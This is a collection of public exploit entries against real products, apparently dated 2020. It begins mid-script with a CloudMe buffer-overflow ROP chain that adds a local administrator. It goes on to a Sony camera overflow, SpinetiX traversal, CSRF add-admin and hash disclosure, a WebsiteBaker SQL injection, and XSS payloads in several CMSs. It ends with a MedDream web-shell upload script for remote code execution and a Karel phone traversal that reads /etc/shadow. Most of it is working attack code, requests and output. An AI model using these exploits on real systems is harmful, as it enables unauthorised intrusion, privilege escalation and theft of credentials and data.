0x6990F972, # RETN 10 [Qt5Network.dll] # PUSHAD - Setup Call to MSVCRT.system on stack 0X68f7bc5e # pushad # ret # [Qt5Core.dll] ] print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!")) return ''.join(struct.pack('<I', _) for _ in GaDG3Tz) def sendRecv(s,p): print(formatMsg("Sending payload: ")) print(S[3]+F[7]+payload+S[0]) s.send(p) data = s.recv(1024) return data def header(): head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0] return head def sig(): SIG = S[3]+F[4]+" .-----.._ ,--.\n" SIG += F[4]+" | .. > ___ | | .--.\n" SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n" SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n" SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n" SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] return SIG def footer(): foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n') return foot if __name__ == "__main__": print(header()) print(sig()) print(footer()) if len(sys.argv) != 3: print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0])) print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0])) sys.exit(-1) host = sys.argv[1] port = int(sys.argv[2]) rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain() os_EIP = '\41'*1052 os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain)) nSEH = '\x42'*4 SEH = '\x43'*4 buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH term = '\r\n' kern32 = 'msvcrt.dll'+'AAAAAA' winExe = 'system'+'BBBBBB' addUsr = 'net user boku 0v3R9000! /add'+'CCCC' addAdm = 'net localgroup Administrators boku /add'+'DDDD' rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm)) payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) print(formatMsg( "Successfully connected to "+host+" on port "+str(port))) resp = sendRecv(sock,payload) print(formatMsg("Closing Socket")) sock.close() print(formatErr("Exiting python script.")) except: print(formatErr("Failed to connect and send payload."))

# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow # Google Dork: Server: Mida eFramework # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro.sony # Version: <= 1.82.01 #!/usr/bin/env python # # # Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow # # # Vendor: Sony Electronics Inc. # Product web page: https://pro.sony # Affected version: SNC-DH120T v1.82.01 # # # Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize # the way business communicates over global IP networks. IPELA products can improve the # efficiency of your organization by connecting people and places with high-quality audio # and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome # network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF # compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate. # # Desc: The vulnerability is caused due to a boundary error in the processing of received # FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited # to cause a stack-based buffer overflow when a user issues a POST request to connect to a # malicious FTP server. Successful exploitation could allow execution of arbitrary code on # the affected device or cause denial of service scenario. # # Tested on: gen5th/1.x # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5596 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php # Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928 # # # 28.10.2019 # # PoC: # Trigger: # curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \ # -H 'Connection: keep-alive' \ # -H 'Cache-Control: max-age=0' \ # -H 'Authorization: Basic YWRtaW46YWRtaW4=' \ # -H 'Upgrade-Insecure-Requests: 1' \ # -H 'Origin: http://10.0.0.3:5080' \ # -H 'Content-Type: application/x-www-form-urlencoded' \ # -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \ # -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ # -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \ # -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \ # --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \ # --compressed \ # --insecure # # # Observed fixed version log: # 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation. # import socket HOST = '127.0.0.1' # 10.0.0.5 PORT = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) conn, addr = s.accept() print 'Connection from', addr while True: data = conn.recv(1024) if not data: break evil = "A" * 100000 evil += "B" * 10000 evil += "C" * 1000 conn.sendall(evil+'\n') s.close()

# Exploit Title: BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated) # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.brightsign.biz # Version: <= 8.2.26 BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF Vendor: BrightSign, LLC Product web page: https://www.brightsign.biz Affected version: Model: XT, XD, HD, LS Firmware / OS version: <=8.2.26 Summary: BrightSign designs media players and provides free software and cloud networking solutions for the commercial digital signage market worldwide, serving all vertical segments of the marketplace. Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Tested on: roNodeJS Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5595 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5595.php 01.08.2020 -- PoC: # curl http://10.0.0.17/speedtest?url=127.0.0.1:22

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application is vulnerable to unauthenticated database download and information disclosure vulnerability. This can enable an attacker to disclose sensitive information resulting in authentication bypass, session hijacking and full system control. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5593 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php 03.08.2020 -- Request: -------- GET /content/files/backups/ HTTP/1.0 Host: 192.168.1.1 Response: --------- HTTP/1.1 200 OK Date: Wed, 26 Aug 2020 15:57:40 GMT Server: Apache/2.2.22 (Unix) X-spinetix-firmware: 3.0.6-1.0.21932 X-raperca-version: 3.0.6-1.0.21912 X-spinetix-serial: 001d400027b8 X-spinetix-hw: BonsaiT Content-Length: 636 Connection: close Content-Type: text/html;charset=UTF-8 Index of /content/files/backups Name Last modified Size Description Parent Directory - Custom1337Name.7z 25-Aug-2020 10:06 1.0M Extracting the .7z shows userpwd.txt file, cat userpwd.txt: admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0 testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - File Delete Path Traversal # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 File Backup/Delete Path Traversal Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application suffers from an authenticated path traversal vulnerability. Input passed via several parameters in index.php script is not properly verified before being used to create and delete files. This can be exploited to write backup files to an arbitrary location and/or delete arbitrary files via traversal attacks. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5594 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php 03.08.2020 -- File Backup Path Traversal: --------------------------- POST /fusion/index.php?r=backup/create HTTP/1.1 Host: 192.168.1.1 Content-Length: 62 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mooshoo/1.2 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/fusion/index.php?r=settings/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: fusionsess=vb5se309b2seig780p47ch0pn1 Connection: close SystemBackup%5Bname%5D=..%2Ftest&SystemBackup%5Bbackupall%5D=0 File Delete (test.7z) Path Traversal: ------------------------------------- GET /fusion/index.php?r=backup/delete&id=backup%3A../test&_=1600981467420 HTTP/1.1 Host: 192.168.1.1 Arbitrary File Delete Null Terminated String Extension Bypass Path Traversal: ----------------------------------------------------------------------------- GET /fusion/index.php?r=backup/delete&id=backup%3A../scripts/layouttheme.js%00&_=1600981467420 HTTP/1.1 Host: 192.168.1.1 Arbitrary Image Delete: ----------------------- GET /fusion/index.php?r=files/delete&id=image%3A../dirtysecret.svg&_=1601128841154 HTTP/1.1 Host: 192.168.1.1

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5592 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5592.php 03.08.2020 -- <html> <body> <script>history.pushState('', '', '/index.php?r=settings/settings')</script> <form action="http://192.168.1.1/fusion/index.php?r=users/create" method="POST"> <input type="hidden" name="User[username]" value="" /> <input type="hidden" name="User[username]" value="ZSL" /> <input type="hidden" name="User[new_password]" value="testingus" /> <input type="hidden" name="User[repeat_password]" value="testingus" /> <input type="hidden" name="User[userRoles]" value="Administrator" /> <input type="submit" value="Forge!" /> </form> </body> </html>

# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration # Date: 2020-09-30 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.spinetix.com # Version: <= 8.2.26 SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration Weakness Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: <= 3.4.8 (1.0.36274) Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a dynamic new storytelling platform to engage with people. For more than 13 years, we have been constantly innovating to deliver cutting-edge digital signage solutions that help our customers shine. Fusion is a built-in content management application accessible from a standard web browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does not require any additional license, cost, or software installation. Desc: The weakness is caused due to the login script and how it verifies provided credentials. Attacker can use this weakness to enumerate valid users on the affected node. Tested on: Apache 2.2.34 PHP/5.3.18-2 Linux 2.6.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5591 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5591.php 03.08.2020 -- POST /fusion/index.php?r=users/login HTTP/1.1 Host: 192.168.1.1 User[username]=NonExisting&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 Response: Username is incorrect. HTML: <div class="user_password login"><div class="errorLogin">Username is incorrect.</div> --- POST /fusion/index.php?r=users/login HTTP/1.1 Host: 192.168.1.1 User[username]=admin&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 Response: Password is incorrect. HTML: <div class="user_password login"><div class="errorLogin">Password is incorrect.</div>

# Exploit Title: MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated) # Date: 2020-09-20 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: N/A Proof of Concept: 1. In the upload images page, make a request to delete an already uploaded image. If no image present, upload an image and then make a request to delete that image. 2. Notice the Request URL <ip>/base_path_to_cms/uploads?delimg=../../../../../Temp/Copy.txt This deletes the file ‘copy.txt’ from C:\Temp 3. Use simple directory traversals to delete arbitrary files. Note: php files can be unlinked and not deleted. =========================================================================================================================== ########################################################################################################################### =========================================================================================================================== # Exploit Title: MonoCMS Blog - Account Takeover (CSRF) # Date: September 29th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: CVE-2020-25986 Proof of Concept: Login using a test user (attacker). Make a password change request, and enter a new password and then intercept the request (in BurpSuite). Generate a CSRF PoC. Save the HTML code in an html file. Login as another user (victim), open the CSRF-PoC html file, and click on submit request. Victim user’s password will be changed. =========================================================================================================================== ########################################################################################################################### =========================================================================================================================== # Exploit Title: MonoCMS Blog - Sensitive Information Disclosure (Hardcoded Credentials) # Date: September 29th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: https://monocms.com/download # Software Link: https://monocms.com/download # Version: 1.0 # Tested On: Windows 10 (XAMPP) # CVE: CVE-2020-25987 Proof of Concept: Hard-coded admin and user hashes can be found in the “log.xml” file in the source-code files for MonoCMS Blog. Hash type is bcrypt and hashcat mode 3200 can be used to crack the hash.

# Exploit Title: WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated) # Google Dork: - # Date: 2020-09-20 # Exploit Author: Roel van Beurden # Vendor Homepage: https://websitebaker.org # Software Link: https://wiki.websitebaker.org/doku.php/en/downloads # Version: 2.12.2 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-25990 1. Description: ---------------------- WebsiteBaker 2.12.2 allows SQL Injection via parameter 'display_name' in /websitebaker/admin/preferences/save.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from /websitebaker/admin/preferences/save.php and save it like burp.req Then run SQLmap to extract the data from the database: sqlmap -r burp.req --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- display_name=Administrator" AND (SELECT 9637 FROM (SELECT(SLEEP(5)))ExGN)-- Cspz&language=EN&timezone=system_default&date_format=M d Y&time_format=g:i A&[email protected]&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw 4. Burpsuite request: ---------------------- POST /websitebaker/admin/preferences/save.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/websitebaker/admin/preferences/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 228 Connection: close Cookie: wb-8123-sid=otfjsmqu8vljs9737crkcm8nec Upgrade-Insecure-Requests: 1 display_name=Administrator&language=EN&timezone=system_default&date_format=M+d+Y&time_format=g%3Ai+A&email=admin%40example.com&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw

# Exploit Title: GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated) # Google Dork: - # Date: 2020-09-29 # Exploit Author: Roel van Beurden # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download # Version: 3.3.16 # Tested on: Linux Ubuntu 18.04 # CVE: N/A 1. Description: ---------------------- GetSimple CMS 3.3.16 allows in parameter 'permalink' on the Settings page persistent Cross Site Scripting which is executed when you create and open a new page. 3. Affected parameter: ---------------------- 'permalink' on /admin/settings.php 3. Exploitation steps: ---------------------- 1: Create a new page 2: Go to Settings on the right top of the page 3: Add XSS payload to "Custom Permalink Structure" text field 4: Save Settings 5: Go to the tab 'pages' to trigger the XSS alert popup 3: Example payload: ---------------------- "><img src=x onerror=alert('XSS')> 4: Burp Request: ---------------------- POST /GetSimpleCMS-3.3.16/admin/settings.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/GetSimpleCMS-3.3.16/admin/settings.php Content-Type: application/x-www-form-urlencoded Content-Length: 349 Connection: close Cookie: __atuvc=22%7C39; __atuvs=5f689d4d88949892015; GS_ADMIN_USERNAME=admin; d46405c5e4a3aa8c65850d4fa6ba75e926569261=1995ba85457ab3e86fa5e01f9ed5267cf9775880 Upgrade-Insecure-Requests: 1 nonce=c4577f17fac90ca1b8306ce48571c27a0a7923ec&sitename=GetSimple+Test+VM&siteurl=http%3A%2F%2F127.0.0.1%2FGetSimpleCMS-3.3.16%2F&prettyurls=1&permalink=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E&user=admin&email=admin%40example.org&name=&timezone=&lang=en_US&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings 5: Exploitation demo: ---------------------- https://www.youtube.com/watch?v=8IMfD5KGt_U

# Exploit Title: CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) # Google Dork: - # Date: 2020-09-29 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-24860 1. Description: ---------------------- CMS Made Simple 2.2.14 allows an authenticated user with access to the Content Manager to edit content and put persistent XSS payload in the affected text fields. The user can get cookies from every authenticated user who visits the website. 2. Affected parameters: ---------------------- Content > Content Manager > Edit some page > Logic (tab) > Page Specific Metadata (text field) Content > Content Manager > Edit some page > Logic (tab) > Smart data or logic that is specific to this page (text field) 3: Example payload: ---------------------- <script>alert(document.cookie);</script> 4: Exploitation demo: ---------------------- youtube.com/watch?v=M6D7DmmjLak&t=22s

# Exploit Title: Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting # Exploit Author: Alperen Ergel # Web Site: https://alperenae.gitbook.io/ # Contact: @alperen_ae (IG) @alpren_ae (TW) # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Powered by Typesetter" # Date: 2020-09-29 # CVE :- ######## Description ######## # # 1-) Loggin administrator page # # 2-) Edit under Settings > Configration > General Settings > title and add payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /typesetter/Admin/Configuration HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/typesetter/Admin/Configuration Content-Type: application/x-www-form-urlencoded Content-Length: 1134 Connection: close Cookie: g=2; gpEasy_bf7bf352c176=zM0WimE3PVwK7QeQaaK88BgSGnOYXfD7d5y7K815; __gads=ID=6078ee5aea85c9aa:T=1600515511:S=ALNI_MaaxxD3-kKm1mS0BDTLxQUBoD-1bw; _ga=GA1.2.862675868.1600515711; __atuvc=3%7C38%2C1%7C39%2C3%7C40; wires_challenge=afzBq%2FHPKhRGhabSML1Jc738JzKxfr4w; _gid=GA1.2.50322462.1601402080 Upgrade-Insecure-Requests: 1 verified=1fe7b252b3aa6f0a3ef412e4d9556f34bce5d15f0433057805e74c41305a2cab2641a4ec81988341275dab33e5f92e8ebd3cf70766f8b9718f835d1e4f5ec78d &title=%3Cscript%3Ealert%28%22THIS+IS+XSS+PAYLOAD%22%29%3B%3C%2Fscript%3E&keywords=&desc=&aaa=Save+%28All%29&colorbox_style=example1&gallery_legacy_style=false&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true &showgplink=false&showgplink=true&maximgarea=2073600&resize_images=false&resize_images=true&preserve_icc_profiles=false&preserve_icc_profiles=true&preserve_image_metadata=false&preserve_image_metadata=true&maxthumbsize=300&maxthumbheight=&thumbskeepaspect=false&auto_redir=90&history_limit=30&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&space_char=-&toemail=cms%40gfdk.org&toname=dsadasda&from_address=AutomatedSender%40localhost&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config

#!/usr/bin/python # # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Date: 2020-10-01 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Timeline # 05-02-20: Submitted incident through email, immediate response # 05-04-20: Issue resolved, New version released 6.8.3.1.751 # # Note: Core Vulnerability resides in another product which has been remediated as well # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, username, password, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter Username: user1 # Enter Password: SoSecure!! # Enter command: whoami # 212357 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen from bs4 import BeautifulSoup import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") uname = raw_input("Enter Username: ") pword = raw_input("Enter Password: ") cmd = raw_input("Enter command: ") URL1= 'http://' + ip_addr + '/Pacs/login.php' URL2= 'http://' + ip_addr + '/Pacs/authenticate.php' URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() site = session.get(URL1) soup = BeautifulSoup(site.content, "html.parser") antispam = soup.find("input", {"name":"formAntiSpam"})["value"] dbname = soup.find("input", {"name":"aetitle"})["value"] login_data = { 'loginvalue': 'login', 'aetitle': dbname, 'username': uname, 'password': pword, 'formAntispam': antispam, 'login': 'Login', } r = session.post(URL2, data = login_data) files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] r = session.post(URL3, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main()

# Exploit Title: Photo Share Website 1.0 - Persistent Cross-Site Scripting # Date: 2020-09-30 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14478/photo-share-website-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/photo-share-website-using-php.zip # Tested on: Linux Apache2 POST /soci/ajax.php?action=save_comment HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 45 DNT: 1 Connection: close Referer: http://localhost/soci/index.php?page=home Cookie: mode=day; src=1; BEEFHOOK=0hqrkHLyTmW38TaPrDHRUW4LsDpXKDSSqAQf54dt0hIA0wFNpjkoJYFlnGhoKw2T4qQHIUZ5oESFGSVW; PHPSESSID=cq8j6ug2vem0obmno6fi0h9404; access=1 Origin: foo.example.org PoC: post_id=4&comment="><script>alert(2)</script>

# Exploit Title: Karel IP Phone IP1211 Web Management Panel - Directory Traversal # Exploit Author: Berat Gokberk ISLER # Date: 2020-09-01 # CVE: N/A # Type: Webapps # Vendor Homepage: https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon # Version: IP1211 Details Directory traversal vulnerability on the Karel IP1211 IP Phone Web Panel. Remote authenticated users (Attackers used default credentials in this case) to perform directory traversal, provides access to sensitive data under indexes using the "cgiServer.exx?page=" parameter. In this case sensitive files, "passwd" and "shadow" files. # Vulnerable Parameter Type: GET # Payload: ../../../../../../../../etc/passwd or /etc/shadow # First Request: GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= # Basic Auth --> admin:admin Connection: close Upgrade-Insecure-Requests: 1 # First Response HTTP/1.0 200 OK Content-Type:text/html;charset=UTF-8 Expires:-1 Accept-Ranges:bytes Server:SIPPhone root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:501:501:Guest,,,:/:/bin/sh # Second Request GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/shadow HTTP/1.1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= # Basic Auth --> admin:admin Connection: close Upgrade-Insecure-Requests: 1 # Second Response HTTP/1.0 200 OK Content-Type:text/html;charset=UTF-8 Expires:-1 Accept-Ranges:bytes Server:SIPPhone 